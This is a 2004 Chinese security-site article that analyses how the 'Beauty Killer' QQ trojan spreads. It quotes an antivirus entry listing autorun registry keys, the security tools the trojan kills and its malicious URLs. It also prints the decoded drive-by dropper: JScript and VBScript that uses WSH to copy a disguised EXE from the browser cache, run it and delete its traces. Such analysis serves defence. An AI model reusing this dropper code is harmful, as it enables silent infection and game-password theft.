登录社区:用户名: 密码: 忘记密码 网页功能:加入收藏 设为首页 网站搜索  

文档

下载

图书

论坛

安全

源码

硬件

游戏
首页 信息 空间 VB VC Delphi Java Flash 补丁 控件 安全 黑客 电子书 笔记本 手机 MP3 杀毒 QQ群 产品库 分类信息 编程网站
  立华软件园 - 安全技术中心 - 技术文档 - 黑客编程 技术文章 | 相关下载 | 电子图书 | 攻防录像 | 安全网站 | 在线论坛 | QQ群组 | 搜索   
 安全技术技术文档
  · 安全配制
  · 工具介绍
  · 黑客教学
  · 防火墙
  · 漏洞分析
  · 破解专题
  · 黑客编程
  · 入侵检测
 安全技术工具下载
  · 扫描工具
  · 攻击程序
  · 后门木马
  · 拒绝服务
  · 口令破解
  · 代理程序
  · 防火墙
  · 加密解密
  · 入侵检测
  · 攻防演示
 安全技术论坛
  · 安全配制
  · 工具介绍
  · 防火墙
  · 黑客入侵
  · 漏洞检测
  · 破解方法
 其他安全技术资源
  · 攻防演示动画
  · 电子图书
  · QQ群组讨论区
  · 其他网站资源
最新招聘信息

“美女杀手”传播过程全解析
发表日期:2004-03-18作者:casit[] 出处:  

前几日,一个朋友中了一个病毒,他的qq上线后就会自动发给好友一个网址。这个病毒弄的他叫苦不迭,我应邀到那个网之看了一下,发现了病毒传播的过程,在此把发现过程共享一下给大家,希望大家对病毒能够引起重视,同时也不要害怕,正确的对待它。

下面的信息是关于这个病毒的一个变种在瑞星病毒库资料里的信息:

Trojan.Legend.Syspoet.b.enc

WINDOWS下的PE病毒

美女杀手

VB写的盗游戏密码的木马,采用UPX压缩,一旦执行,病毒将自我复制到系统文件夹:

%SYSDIR%\filename.exe

它将创建下列注册表键值来使自己随Windows系统自启动:

HKLM\SoftWare\Microsoft\Windows\CurrentVersion\RunServices

"filename.exe"="filename.exe"

HKLM\SoftWare\Microsoft\Windows\CurrentVersion\Run

"filename.exe"="filename.exe"

其中"filename"可能会变化.比如:"sobsm.exe".

它将终止带有下列字眼的程序的执行:

瑞星

金山毒霸

江民

专杀

木马

防火墙

监控

注册表编辑器

任务管理器

进程列表

进程管理

Antivirus

Trojan

REGSNAP

REGSHOT

REGISTRY MONITOR

W32DASM

它通过QQ发送虚假消息给在线好友,导致在线好友上当,有鉴于此,希望用户收到带有下列链结的请不要访问:

http://qiumei.3322.org/zhaopian/me.jpg

http://jiawei.6600.org/zhaopian/me.jpg

http://siting.8800.org/zhaopian/me.jpg

http://qianhui.9966.org/zhaopian/me.jpg

http://xiujuan.2288.org/zhaopian/me.jpg

它将盗取游戏“传奇”的各种信息:

账号

区域

服务器

密码

附加

同时它还将盗取的信息发送到可配置的指定邮箱。

注: %SYSDIR% 是可变的WINDOWS系统文件夹,默认为: C:\Windows\System (Windows 95/98/Me),

C:\Winnt\System32 (Windows NT/2000), 或 C:\Windows\System32 (Windows XP)、

%WINDIR% 是可变的,是WINDOWS的安装目录(默认为: C:\Windows or C:\Winnt).

因为我事先知道是病毒,所以对待比较小心。我看到连接地址最后是一个.jpg的文件,于是我就打开了flashget,(用flashget下载,病毒总不会发作吧),下载后,怎么办?我看到下载下来的文件只有几k而已,料想不会有什么复杂的东西在里面,于是就启动了图像编辑器,打开这个文件。奇怪的事情发生了,格式错误!!!难道是我下错了?于是我就涨起胆子连到了那个网址上,一幅图片出现了,(其实我觉得哪个女的不漂亮,呵呵)。这下子我可傻了。根据我的经验,我已经中着了。反正也中着了,抱着死猪不怕开水烫的心态,我大胆的进行了进一步的分析。首先,我察看了一下哪个图片的属性。一个细节被我捕捉到了,我连接得网址最后是一个me.jpg,可是那幅图片的属性是my.jpg,这可是一个线索,于是我习惯性的打开了源文件(精彩的部分开始了)。我看到了如下的内容:

<html>

<head>

<script language="JScript.Encode">#@~^xQEAAA==@#@&@!Z O@#@&\mD,AWMNdP{JYf;tYss]22]Z9Y!z]2Z8W[zu&3]Z9]ZbYf;W4%n1YY Z[mYCu&G] yhbUEa/ lkwY+y] ZA+botDYffZ]y!Ak[O4]ffu+!Z]f3u&Z&G(LnmDY22YZfu!bu&;r:T]+!kD^Y2f:H Lao]23Y!G]ZbY&/G(LnmDY ZNCOm]&9Yy 4+^sKRCkwu u ZA+bo4Yu&9Tu !SrNDt]29Y Z!u&3]f/JW8L^Yu&3YZf]T)u&/z(G9XY22u!fu!zY&;z4YsVYfAJPJ&w!YPHG;D,mMk2YG~1W[+,OtDn@#@&0EU^DkGx,G!YAKD9`#@#@&P@#@&7l.P   +AAKDNkI@#@&x+SAGD9/,'~EUnkmCwchKD[d*i@#@&[Km;:UDRAMkD+`   +SAWMNd#p@#@&N,@#@&K;YSWD9cbi@#@&Jz~OR@*@#@&Qn4AAA==^#~@</script>

</head>

<body>

</body>

</html>

怪了!!!.jpg的文件怎么会成了<html>代码了呢?看来,作者还真下了一番功夫,把服务器的文件解析也改了?厉害厉害!!!

看到没,加密了,不过不要紧,网上到处都可以找到解密工具。解密后,代码如下:

<html>

<head>

<script language="JScript.Encode">

<!--

var words ="%3Chtml%3E%0D%0A%3Cbody%3E%0D%0A%3Cobject%20data%3D%22winups.asp%22%20weight%3D0%20width%3D%200%3E%3C/object%3E%0D%0A%3Cimg%20src%3Dmy.jpg%3E%0D%0A%3Cobject%20data%3D%22hello.asp%22%20weight%3D0%20width%3D%200%3E%3C/object%3E%0D%0A%3C/body%3E%0D%0A%3C/html%3E" //put your cripto code there

。。。。。。。。这一段是加密后的代码

function outword()

{

var newwords;

newwords = unescape(words);

document.write(newwords);。。。。。。。解密后写入网页内

}

outword();

// -->

</script>

</head>

<body>

</body>

</html>

看来作者为了难为我们,还加密了这段代码,不过没关系,它能加密,我们就能解密,并且,他的加密手段很简单,不过是应用了现成的js的函数,我们用unescape()不就解密了么。于是,我动手写了一个小脚本,把上述代码解密了出来。

加密的代码内容如下:

<html>

<body>

<object data="winups.asp" weight=0 width= 0></object>

<img src=my.jpg>。。。。。。。。。现在明白为什么是my.jpg了吧

<object data="hello.asp" weight=0 width= 0></object>

</body>

</html>

看到了么,尾巴露出来了!!!,这两个文件可是关键啊。于是乎,下载了这两个文件。(扩展名就随意了)。

我先打开了winups.asp(是用记事本打开的,我发现文件开头有MZ字样),哈哈,原来这是一个.exe文件。先不理会他,看看另一个,另一个相对简单,打开之后一看是一段脚本代码(可恶,竟然又加密了)。没办法,解密,得到如下代码:

<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>

<HTA:APPLICATION caption="no" border="none" visiable="no" windowState="minimize" >

。。。。这是在建立脚本对象

<script LaNGUAGE="VBScript.Encode">

window.moveTo -100,-100

。。。。哈哈,竟然用这种隐藏窗体的方法

Set g_fs = CreateObject("Scripting.FileSystemObject")

Set tf = g_fs.CreateTextFile("c:\isp.hta",true)

。。。。看看,来了不是,开始文件操作了吧

tf.write "<HTA:APPLICATION caption=" & CHR(34)& "no" & CHR(34)& " border=" & CHR(34)& "none" & CHR(34)& " visiable=" & CHR(34)& "no" & CHR(34)& " showintaskbar=" & CHR(34)& "no" & CHR(34)& " >" &chr(13)&chr(10)

。。。。。看来作者是要用脚本来写脚本了,够狠!!!

tf.write "<object id='wsh' cl"& chr(97)&"ssid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>"&chr(13)&chr(10)

。。。。。F935DC22-1CF0-11D0-ADB9-00C04FD58A0B 是WSH的sid

tf.write "<" & "script LANGUAGE=" & CHR(34)& "VBScript" & CHR(34)& ">"&chr(13)&chr(10)

tf.write "on error resume next"&chr(13)&chr(10)

tf.write "window.moveTo -100,-100"&chr(13)&chr(10)

tf.write "window.resizeTo 0,0 "&chr(13)&chr(10)

tf.write "dim exepath"&chr(13)&chr(10)

tf.write "Function Search(objFolder) "&chr(13)&chr(10)

tf.write "Dim objSubFolder"&chr(13)&chr(10)

tf.write "For Each objFile in objFolder.Files"&chr(13)&chr(10)

tf.write "If InStr(1, objfile.name, " & CHR(34)& "winups" & CHR(34)& ", vbtextcompare) then"&chr(13)&chr(10)

tf.write "set filecp = objg_fso.getfile(objfile.path)"&chr(13)&chr(10)

tf.write "filecp.copy (exepath)"&chr(13)&chr(10)

tf.write "exit for"&chr(13)&chr(10)

tf.write "End If"&chr(13)&chr(10)

tf.write "Next "&chr(13)&chr(10)

tf.write "For Each objSubFolder in objFolder.SubFolders "&chr(13)&chr(10)

tf.write "Search objSubFolder"&chr(13)&chr(10)

tf.write "Next"&chr(13)&chr(10)

tf.write "End Function"&chr(13)&chr(10)

。。。。这个函数是找到winups哪个文件,然后复制到系统目录下

。。。。

tf.write "Set objg_fso = CreateObject(" & CHR(34)& "Scripting.FileSystemObject" & CHR(34)& ")"&chr(13)&chr(10)

tf.write "str=WSH.regread(" & CHR(34)& "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\cache" & CHR(34)& ")"&chr(13)&chr(10)

。。。。这是在寻找缓存目录

tf.write "set tempfolder = objg_fso.getfolder(str)"&chr(13)&chr(10)

tf.write "set othisfolder = objg_fso.GetSpecialFolder(1)" &chr(13)&chr(10)

tf.write "exepath=othisfolder.path & "& chr(34) & "\win.exe" & chr(34) &chr(13)&chr(10)

tf.write "search tempfolder"&chr(13)&chr(10)

。。。。真是的,还要复制到系统目录下,可恶

tf.write "wsh.run (exepath)"&chr(13)&chr(10)

tf.write "wsh.run " & CHR(34)& "command.com /c del c:\isp.hta" & CHR(34)& " ,0"&chr(13)&chr(10)

。。。。呵呵,还不忘了删除自己,习惯不错,值得学习

tf.write "window.close()"&chr(13)&chr(10)

tf.write "<" &chr(47)& "script>"&chr(13)&chr(10)

tf.close

wsh.run "c:\isp.hta",0

window.close ()

</script>

有一个

真是一段短小精悍的代码。估计流程大家已经看明白了。先在缓存里找到那个文件,然后复制到系统目录里,并执行它。而且,精彩之处还在于,作者用脚本生成了一个脚本。剩下来的工作,我就不敢做了,让我跟踪.exe文件,找出其中的流程,过几年再说吧。不过就看这之前的脚本,也是极为精彩的。其实,如果你想学编程,一定要学习一些病毒代码,这里面有很多值得借鉴的东西。先从简单的学起,比如这个病毒。

整个跟踪下来,我一直很是兴奋,不是因为我发现了病毒的传播方法,而是为作者的代码拍案叫绝。如果你还懂一点编程的话,那么你应该学习怎么去欣赏一段代码,好的代码,就像文学里的诗歌一样,虽短小,却回味无穷。

呵呵,扯了一堆废话,还是干正事要紧,赶快把我提取出的病毒打了个包,发给了瑞星。(那天应该是02/26)。大约三天后,得到了瑞星的回复,告诉了我这是“美女杀手”。到网站一看,还是个新病毒。

说来也巧,我和我同学都打开了那个网址,可是我对那个病毒“屡试不爽”,而我同学却被折腾的“爽的不得了”,一看病毒库资料,我才恍然大悟,原来是vb的程序,而我没有装studio,也没装其他的vb程序,所以没有vb6运行库,病毒当然无法运行。哈哈,想起来真是后怕。

希望通过此文,大家能够对病毒有一个新的认识,其实病毒也不可怕,只要弄清了机理,病毒可是一个好玩的东西。

我来说两句】 【发送给朋友】 【加入收藏】 【返加顶部】 【打印本页】 【关闭窗口
中搜索 “美女杀手”传播过程全解析

 ■ [欢迎对本文发表评论]
用  户:  匿名发出:
您要为您所发的言论的后果负责,故请各位遵纪守法并注意语言文明。

最新招聘信息

关于我们 / 合作推广 / 给我留言 / 版权举报 / 意见建议 / 广告投放 / 友情链接  
Copyright ©2001-2006 Lihuasoft.net webmaster(at)lihuasoft.net
网站编程QQ群   京ICP备05001064号 页面生成时间:0.00158